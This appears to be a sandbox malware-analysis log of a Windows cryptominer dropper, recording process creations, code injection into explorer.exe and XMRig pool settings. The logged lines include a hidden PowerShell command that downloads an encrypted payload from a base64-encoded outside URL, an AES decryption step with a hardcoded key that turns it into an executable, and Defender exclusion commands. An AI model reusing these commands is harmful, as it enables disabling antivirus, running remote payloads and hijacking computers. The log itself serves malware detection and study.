                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'Jump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0030A1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,13_2_0030A1B0
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeNtMapViewOfSection: Indirect: 0x1677ADB8CB4
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeNtMapViewOfSection: Indirect: 0x1677ADB8777
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeNtMapViewOfSection: Indirect: 0x16DE6BC8777
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeNtMapViewOfSection: Indirect: 0x16DE6BC8CB4
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeNtUnmapViewOfSection: Indirect: 0x1677ADB8C48
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeNtUnmapViewOfSection: Indirect: 0x16DE6BC8C48
                    Injects code into the Windows Explorer (explorer.exe)
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 1436 base: 140000000 value: 4D
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 1436 base: 140001000 value: NU
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 1436 base: 140665000 value: DF
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 1436 base: 140834000 value: 00
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 1436 base: 11AF010 value: 00
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeThread register set: target process: 1436
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00304410 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,13_2_00304410
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_003044E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,13_2_003044E0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E042E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,16_2_00E042E0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,16_2_00E043D0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0A3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,16_2_00E0A3B0
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe" Jump to behavior
                    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'Jump to behavior
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "invoke-webrequest -uri ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('ahr0chm6ly93b28wotc4nzg3odeud2lul2rvd25sb2fkzwrfzmlszs5iaw4='))) -outfile 'c:\users\user\appdata\local\temp\downloaded_file.bin'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$key = [system.text.encoding]::utf8.getbytes('blmgb+wrfprxmfxk7ymkpm3svhuaypt9');" "$iv = [system.text.encoding]::utf8.getbytes('5t9nsupo0ca/tujh');" "$aes = [system.security.cryptography.aes]::create();" "$aes.key = $key; $aes.iv = $iv;" "$decryptor = $aes.createdecryptor();" "$inputfile = 'c:\users\user\appdata\local\temp\downloaded_file.bin';" "$encryptedbytes = [system.io.file]::readallbytes($inputfile);" "$decryptedbytes = $decryptor.transformfinalblock($encryptedbytes, 0, $encryptedbytes.length);" "$outputfile = 'c:\users\user\appdata\local\temp\downloaded_file.exe';" "[system.io.file]::writeallbytes($outputfile, $decryptedbytes);"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "invoke-webrequest -uri ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('ahr0chm6ly93b28wotc4nzg3odeud2lul2rvd25sb2fkzwrfzmlszs5iaw4='))) -outfile 'c:\users\user\appdata\local\temp\downloaded_file.bin'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$key = [system.text.encoding]::utf8.getbytes('blmgb+wrfprxmfxk7ymkpm3svhuaypt9');" "$iv = [system.text.encoding]::utf8.getbytes('5t9nsupo0ca/tujh');" "$aes = [system.security.cryptography.aes]::create();" "$aes.key = $key; $aes.iv = $iv;" "$decryptor = $aes.createdecryptor();" "$inputfile = 'c:\users\user\appdata\local\temp\downloaded_file.bin';" "$encryptedbytes = [system.io.file]::readallbytes($inputfile);" "$decryptedbytes = $decryptor.transformfinalblock($encryptedbytes, 0, $encryptedbytes.length);" "$outputfile = 'c:\users\user\appdata\local\temp\downloaded_file.exe';" "[system.io.file]::writeallbytes($outputfile, $decryptedbytes);"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00310400 AllocateAndInitializeSid,_memset,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,13_2_00310400
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031C3A0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_0031C3A0
                    Source: explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: me":ername":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activeow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Manager
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: foqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}H22
                    Source: explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2934227088.0000000003950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"yeerysyjbfoqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":61,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":0.0,"status":2}
                    Source: explorer.exe, 0000001C.00000002.2934227088.0000000003950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Managerpool.hashvault.pro46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"yeerysyjbfoqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":61,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":0.0,"status":2}]
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"yeerysyjbfoqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: foqmofc","computername":"642294","username":"user","gpu":"5288N63ZM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: OpenEventW,OpenMutexW,OpenMutexW,WaitForSingleObject,CreateEventW,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,WaitForSingleObject,WaitForSingleObject,setsockopt,CreateEventW,LocalAlloc,CreateThread,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,___crtGetLocaleInfoEx,WSAGetLastError,GetTickCount,GetTickCount,___crtGetLocaleInfoEx,Sleep,shutdown,closesocket,SetEvent,WaitForSingleObject,CloseHandle,LocalFree,CloseHandle,shutdown,closesocket,CloseHandle,ExitProcess,WaitForSingleObject,WaitForSingleObject,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,CloseHandle,CloseHandle,13_2_00321030
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: setsockopt,___crtGetLocaleInfoEx,closesocket,13_2_003170F2
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: setsockopt,___crtGetLocaleInfoEx,closesocket,13_2_003170D9
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,13_2_00320950
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,wsprintfW,GetForegroundWindow,SetWindowTextW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031F9E0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031FC10
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: LocalAlloc,htons,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,13_2_003204F0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,13_2_00320CD0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,setsockopt,___crtGetLocaleInfoEx,closesocket,setsockopt,___crtGetLocaleInfoEx,closesocket,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,closesocket,13_2_00316D30
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: LocalAlloc,htons,wsprintfA,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,13_2_00320630
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031FE10
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: ___crtGetLocaleInfoEx,13_2_0031F690
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: ___crtGetLocaleInfoEx,13_2_0031F730
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,13_2_0031F7D0
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
